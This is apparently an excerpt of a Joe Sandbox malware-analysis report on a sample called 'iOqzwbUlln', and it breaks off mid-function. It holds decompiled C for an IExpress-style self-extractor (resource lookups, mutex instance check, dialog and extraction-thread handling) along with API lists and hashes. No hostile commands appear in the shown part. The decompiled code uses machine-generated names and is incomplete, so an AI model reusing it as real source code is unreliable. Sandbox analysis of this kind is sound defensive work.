                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e832be
                                                                                                                                                                                                        0x00e83280
                                                                                                                                                                                                        0x00e83289
                                                                                                                                                                                                        0x00e8328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8328e
                                                                                                                                                                                                        0x00e8327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00E88598,00000200), ref: 00E83271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E833E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E833F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00E83410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00E83426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00E8342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E8343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-3817845457
                                                                                                                                                                                                        • Opcode ID: 092515aa370895e9df7aefe3ad5d5b28c484981fd8f3ea0ee7393d1fdf432ba3
                                                                                                                                                                                                        • Instruction ID: 20e6a05b18b7b15f0ac9575754e29564dd97d7530e769f27cac4d4f7df55582b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 092515aa370895e9df7aefe3ad5d5b28c484981fd8f3ea0ee7393d1fdf432ba3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24515A703422417FF7227B369C8CFBB6949DB45F58F146039F61DF60E1CAA48A059361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xe89a3c = __ecx;
                                                                                                                                                                                                        				memset(0xe89140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xe88a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xe888c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xe893ec = 1;
                                                                                                                                                                                                        				_t20 = E00E8468F("TITLE", 0xe89154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xe8858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xe89a34;
                                                                                                                                                                                                        					if(E00E8468F("EXTRACTOPT", 0xe89a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xe89a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xe89120 =  *0xe89120 & _t65;
                                                                                                                                                                                                        							if(E00E85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xe88a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xe88184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xe88a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00E836EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xe89a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xe89a34 & 0x00000100) == 0 || ( *0xe88a38 & 0x00000001) != 0 || E00E818A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00E86517(_t57, 0x7d6, _t34, E00E819E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E82390(0xe88a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00E844B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00E8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xe88588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xe89a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00E844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E00E844B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xe88588);
                                                                                                                                                                                                        										 *0xe89124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00e82cb5
                                                                                                                                                                                                        0x00e82cbc
                                                                                                                                                                                                        0x00e82cc7
                                                                                                                                                                                                        0x00e82cc9
                                                                                                                                                                                                        0x00e82cd1
                                                                                                                                                                                                        0x00e82cd3
                                                                                                                                                                                                        0x00e82cd9
                                                                                                                                                                                                        0x00e82ce9
                                                                                                                                                                                                        0x00e82cf9
                                                                                                                                                                                                        0x00e82d0e
                                                                                                                                                                                                        0x00e82d15
                                                                                                                                                                                                        0x00e82d1c
                                                                                                                                                                                                        0x00e82ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82d2d
                                                                                                                                                                                                        0x00e82d34
                                                                                                                                                                                                        0x00e82d3b
                                                                                                                                                                                                        0x00e82d40
                                                                                                                                                                                                        0x00e82d48
                                                                                                                                                                                                        0x00e82d59
                                                                                                                                                                                                        0x00e82d84
                                                                                                                                                                                                        0x00e82e1f
                                                                                                                                                                                                        0x00e82e1f
                                                                                                                                                                                                        0x00e82e2e
                                                                                                                                                                                                        0x00e82e41
                                                                                                                                                                                                        0x00e82e5a
                                                                                                                                                                                                        0x00e82e62
                                                                                                                                                                                                        0x00e82e6c
                                                                                                                                                                                                        0x00e82e6c
                                                                                                                                                                                                        0x00e82e75
                                                                                                                                                                                                        0x00e82e77
                                                                                                                                                                                                        0x00e82e77
                                                                                                                                                                                                        0x00e82e84
                                                                                                                                                                                                        0x00e82e8b
                                                                                                                                                                                                        0x00e82e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82e96
                                                                                                                                                                                                        0x00e82e96
                                                                                                                                                                                                        0x00e82e9e
                                                                                                                                                                                                        0x00e82ea2
                                                                                                                                                                                                        0x00e82eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82ece
                                                                                                                                                                                                        0x00e82ede
                                                                                                                                                                                                        0x00e82eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82eed
                                                                                                                                                                                                        0x00e82eef
                                                                                                                                                                                                        0x00e82eef
                                                                                                                                                                                                        0x00e82eef
                                                                                                                                                                                                        0x00e82eef
                                                                                                                                                                                                        0x00e82ea2
                                                                                                                                                                                                        0x00e82e86
                                                                                                                                                                                                        0x00e82e88
                                                                                                                                                                                                        0x00e82e88
                                                                                                                                                                                                        0x00e82e43
                                                                                                                                                                                                        0x00e82e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82e48
                                                                                                                                                                                                        0x00e82e30
                                                                                                                                                                                                        0x00e82e30
                                                                                                                                                                                                        0x00e82ef8
                                                                                                                                                                                                        0x00e82f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f01
                                                                                                                                                                                                        0x00e82d8a
                                                                                                                                                                                                        0x00e82d8f
                                                                                                                                                                                                        0x00e82da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82da3
                                                                                                                                                                                                        0x00e82dae
                                                                                                                                                                                                        0x00e82db4
                                                                                                                                                                                                        0x00e82dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82dca
                                                                                                                                                                                                        0x00e82dd3
                                                                                                                                                                                                        0x00e82df5
                                                                                                                                                                                                        0x00e82e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82dd5
                                                                                                                                                                                                        0x00e82dde
                                                                                                                                                                                                        0x00e82de3
                                                                                                                                                                                                        0x00e82e04
                                                                                                                                                                                                        0x00e82e0a
                                                                                                                                                                                                        0x00e82e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82e10
                                                                                                                                                                                                        0x00e82dd3
                                                                                                                                                                                                        0x00e82dbb
                                                                                                                                                                                                        0x00e82da1
                                                                                                                                                                                                        0x00e82d5b
                                                                                                                                                                                                        0x00e82d5b
                                                                                                                                                                                                        0x00e82d5d
                                                                                                                                                                                                        0x00e82d69
                                                                                                                                                                                                        0x00e82d6e
                                                                                                                                                                                                        0x00e82f06
                                                                                                                                                                                                        0x00e82f06
                                                                                                                                                                                                        0x00e82f06
                                                                                                                                                                                                        0x00e82d59
                                                                                                                                                                                                        0x00e82f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CF9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00E82DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82E0A
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: da8e677b00f9990655f1f1dd5d6066220a736edcc698b4467021eeb039e60898
                                                                                                                                                                                                        • Instruction ID: 6f541449118b187afcbab0fba2706662714c9c327d2d46ae081ecdf9d25b2a0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da8e677b00f9990655f1f1dd5d6066220a736edcc698b4467021eeb039e60898
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 335123B07403016EE725BB728D4AB7B36D9EB81704F48602EBB4DF51E1DBB48845D72A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00E834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xe891d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xe88584 = _t35;
                                                                                                                                                                                                        					E00E843D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xe88184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00E84FE0, 0, 0, 0xe88798);
                                                                                                                                                                                                        					 *0xe8879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E00E844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xe8858c);
                                                                                                                                                                                                        					_t38 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					_t25 = E00E844B9(_t38, 0x4b2, 0xe81140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xe891d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xe8858c);
                                                                                                                                                                                                        						_t39 =  *0xe8879c; // 0x0
                                                                                                                                                                                                        						E00E83680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xe8858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xe8879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00e834fb
                                                                                                                                                                                                        0x00e834fe
                                                                                                                                                                                                        0x00e83665
                                                                                                                                                                                                        0x00e83666
                                                                                                                                                                                                        0x00e83666
                                                                                                                                                                                                        0x00e83668
                                                                                                                                                                                                        0x00e8366e
                                                                                                                                                                                                        0x00e8366e
                                                                                                                                                                                                        0x00e83671
                                                                                                                                                                                                        0x00e83671
                                                                                                                                                                                                        0x00e83677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83677
                                                                                                                                                                                                        0x00e83504
                                                                                                                                                                                                        0x00e83506
                                                                                                                                                                                                        0x00e83507
                                                                                                                                                                                                        0x00e8350c
                                                                                                                                                                                                        0x00e8365b
                                                                                                                                                                                                        0x00e8365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83661
                                                                                                                                                                                                        0x00e83512
                                                                                                                                                                                                        0x00e83515
                                                                                                                                                                                                        0x00e835be
                                                                                                                                                                                                        0x00e835c1
                                                                                                                                                                                                        0x00e835d1
                                                                                                                                                                                                        0x00e835d8
                                                                                                                                                                                                        0x00e835de
                                                                                                                                                                                                        0x00e835f8
                                                                                                                                                                                                        0x00e83617
                                                                                                                                                                                                        0x00e83617
                                                                                                                                                                                                        0x00e83623
                                                                                                                                                                                                        0x00e83637
                                                                                                                                                                                                        0x00e8363d
                                                                                                                                                                                                        0x00e83642
                                                                                                                                                                                                        0x00e83644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83646
                                                                                                                                                                                                        0x00e83652
                                                                                                                                                                                                        0x00e83657
                                                                                                                                                                                                        0x00e83658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83658
                                                                                                                                                                                                        0x00e83644
                                                                                                                                                                                                        0x00e8351b
                                                                                                                                                                                                        0x00e8351d
                                                                                                                                                                                                        0x00e8354f
                                                                                                                                                                                                        0x00e83553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8355f
                                                                                                                                                                                                        0x00e83565
                                                                                                                                                                                                        0x00e8357c
                                                                                                                                                                                                        0x00e83581
                                                                                                                                                                                                        0x00e83584
                                                                                                                                                                                                        0x00e8359b
                                                                                                                                                                                                        0x00e835a1
                                                                                                                                                                                                        0x00e835a7
                                                                                                                                                                                                        0x00e835ad
                                                                                                                                                                                                        0x00e835b3
                                                                                                                                                                                                        0x00e835b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e835b8
                                                                                                                                                                                                        0x00e83586
                                                                                                                                                                                                        0x00e83588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83590
                                                                                                                                                                                                        0x00e83524
                                                                                                                                                                                                        0x00e83535
                                                                                                                                                                                                        0x00e83541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00E83535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E83541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00E8355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00E81140,00000000,00000020,00000004), ref: 00E83590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E835C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00E835F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00E835F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00E83610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00E83617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E83623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00E83637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E83671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: 9b0f377788f69a2c30f57699ba8657a2b6c5acbe5a1c56ef7fb7cf469c0293df
                                                                                                                                                                                                        • Instruction ID: cb72fdb19598145c0f39c6fccfc11ccd0229403c0013d6aa7300b937c86b1cac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b0f377788f69a2c30f57699ba8657a2b6c5acbe5a1c56ef7fb7cf469c0293df
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31D3B0241301BFE7206F3AED4DE2B3A69E785F10F58552AFA0EB52A0DA758904DB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00E84224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
